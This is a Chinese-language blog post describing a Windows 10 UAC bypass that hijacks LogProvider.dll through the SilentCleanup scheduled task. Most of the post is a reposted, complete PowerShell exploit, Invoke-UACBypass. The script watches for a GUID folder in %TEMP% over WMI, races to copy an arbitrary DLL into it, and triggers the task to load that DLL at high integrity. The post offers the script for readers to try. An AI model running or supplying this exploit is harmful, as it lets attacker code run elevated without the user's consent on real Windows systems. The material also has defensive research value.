最近看到enigma0x3博客上分享了一种通过Disk Cleanup计划任务进行bypassuac的姿势,感觉还是不错的,所以在这儿分享一下。原文在这里 戳我
关于BypassUAC工具已经很多了,有个非常不错的工具 UACME

简单的说一下通过Disk Cleanup进行bypassuac的原理。

Win10有一个计划任务叫做SilentCleanup,具体位置在\Microsoft\Windows\DiskCleanup

1.png

从图中可以看出,这个计划任务是会使用最高权限运行程序的,而加载此计划任务不需要最高权限。

此任务执行会运行cleanmgr.exe,而且会创建一个新的文件夹“C:\Users\<username>\AppData\Local\Temp\<GUID>” 并将dismhost.exe以及其使用的相关DLL文件复制到这个文件夹下面。

lala.png

当dismhost.exe运行时,会加载其要使用的DLL文件,由于当前目录是在%TEMP%,所以完全可以进行DLL劫持,测试发现LogProvider.dll是最后一个加载的DLL,可以被我们利用,所以只需要把这个DLL替换成我们的恶意DLL,那么这个计划任务运行的时候,我们的DLL就会被加载,达到BypassUAC的目的。为了能马上进行BypassUAC,可以使用WMI来运行这个计划任务。作者已经给出了利用脚本,链接 BypassUAC , 测试DLL链接:MessageBox。

有兴趣的测测看吧~

作者代码被墙了,贴在了下面:

  1. function Invoke-UACBypass {
  2. <#
  3. .SYNOPSIS
  5. Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy.
  7. Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3)
  8. License: BSD 3-Clause
  9. Required Dependencies: None
  10. Optional Dependencies: None
  12. .PARAMETER DllPath
  14. Specifies the path to the DLL you want executed in a high integrity context. Be mindful of the architecture of the DLL. It must match that of %SystemRoot%\System32\Dism\LogProvider.dll.
  16. .EXAMPLE
  18. Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\Win10UACBypass\PrivescTest.dll
  20. .EXAMPLE
  22. Invoke-UACBypass -DllPath C:\Users\TestUser\Desktop\TotallyLegit.txt -Verbose
  24. The DllPath can have any extension as long as the file itself is a DLL.
  25. #>
  27.     [CmdletBinding()]
  28.     [OutputType([System.IO.FileInfo])]
  29.     Param (
  30.         [Parameter(Mandatory = $True)]
  31.         [String]
  32.         [ValidateScript({ Test-Path $_ })]
  33.         $DllPath
  34.     )
  36.     $PrivescAction = {
  37.         $ReplacementDllPath = $Event.MessageData.DllPath
  38.         # The newly created GUID folder
  39.         $DismHostFolder = $EventArgs.NewEvent.TargetInstance.Name
  40.         
  41.         $OriginalPreference = $VerbosePreference
  43.         # Force -Verbose to display in the event
  44.         if ($Event.MessageData.VerboseSet -eq $True) {
  45.             $VerbosePreference = 'Continue'
  46.         }
  48.         Write-Verbose "DismHost folder created in $DismHostFolder"
  49.         Write-Verbose "$ReplacementDllPath to $DismHostFolder\LogProvider.dll"
  50.             
  51.         try {
  52.             $FileInfo = Copy-Item -Path $ReplacementDllPath -Destination "$DismHostFolder\LogProvider.dll" -Force -PassThru -ErrorAction Stop
  53.         } catch {
  54.             Write-Warning "Error copying file! Message: $_"
  55.         }
  57.         # Restore the event preference
  58.         $VerbosePreference = $OriginalPreference
  60.         if ($FileInfo) {
  61.             # Trigger Wait-Event to return and indicate success.
  62.             New-Event -SourceIdentifier 'DllPlantedSuccess' -MessageData $FileInfo
  63.         }
  64.     }
  66.     $VerboseSet = $False
  67.     if ($PSBoundParameters['Verbose']) { $VerboseSet = $True }
  69.     $MessageData = New-Object -TypeName PSObject -Property @{
  70.         DllPath = $DllPath
  71.         VerboseSet = $VerboseSet # Pass the verbose preference to the scriptblock since
  72.                                  # event scriptblocks will not automatically honor -Verbose.
  73.     }
  75.     $TempDrive = $Env:TEMP.Substring(0,2)
  77.     # Trigger the DLL dropper with the following conditions:
  78.     #  1) A directory is created - i.e. new Win32_Directory instance
  79.     #  2) The directory created is created under %TEMP%
  80.     #  3) The directory name is in the form of a GUID
  81.     $TempFolderCreationEvent = "SELECT * FROM __InstanceCreationEvent WITHIN 1 WHERE TargetInstance ISA `"Win32_Directory`" AND TargetInstance.Drive = `"$TempDrive`" AND TargetInstance.Path = `"$($Env:TEMP.Substring(2).Replace('\', '\\'))\\`" AND TargetInstance.FileName LIKE `"________-____-____-____-____________`""
  82.     
  83.     $TempFolderWatcher = Register-WmiEvent -Query $TempFolderCreationEvent -Action $PrivescAction -MessageData $MessageData
  85.     # We need to jump through these hoops to properly capture stdout and stderr of schtasks.
  86.     $StartInfo = New-Object Diagnostics.ProcessStartInfo
  87.     $StartInfo.FileName = 'schtasks'
  88.     $StartInfo.Arguments = '/Run /TN "\Microsoft\Windows\DiskCleanup\SilentCleanup" /I'
  89.     $StartInfo.RedirectStandardError = $True
  90.     $StartInfo.RedirectStandardOutput = $True
  91.     $StartInfo.UseShellExecute = $False
  92.     $Process = New-Object Diagnostics.Process
  93.     $Process.StartInfo = $StartInfo
  94.     $null = $Process.Start()
  95.     $Process.WaitForExit()
  96.     $Stdout = $Process.StandardOutput.ReadToEnd().Trim()
  97.     $Stderr = $Process.StandardError.ReadToEnd().Trim()
  99.     if ($Stderr) {
  100.         Unregister-Event -SubscriptionId $TempFolderWatcher.Id
  101.         throw "SilentCleanup task failed to execute. Error message: $Stderr"
  102.     } else {
  103.         if ($Stdout.Contains('is currently running')) {
  104.             Unregister-Event -SubscriptionId $TempFolderWatcher.Id
  105.             Write-Warning 'SilentCleanup task is already running. Please wait until the task has completed.'
  106.         }
  108.         Write-Verbose "SilentCleanup task executed successfully. Message: $Stdout"
  109.     }
  111.     $PayloadExecutedEvent = Wait-Event -SourceIdentifier 'DllPlantedSuccess' -Timeout 10
  113.     Unregister-Event -SubscriptionId $TempFolderWatcher.Id
  115.     if ($PayloadExecutedEvent) {
  116.         Write-Verbose 'UAC bypass was successful!'
  118.         # Output the file info for the DLL that was planted
  119.         $PayloadExecutedEvent.MessageData
  121.         $PayloadExecutedEvent | Remove-Event
  122.     } else {
  123.         # The event timed out.
  124.         Write-Error 'UAC bypass failed. The DLL was not planted in its target.'
  125.     }
  126. }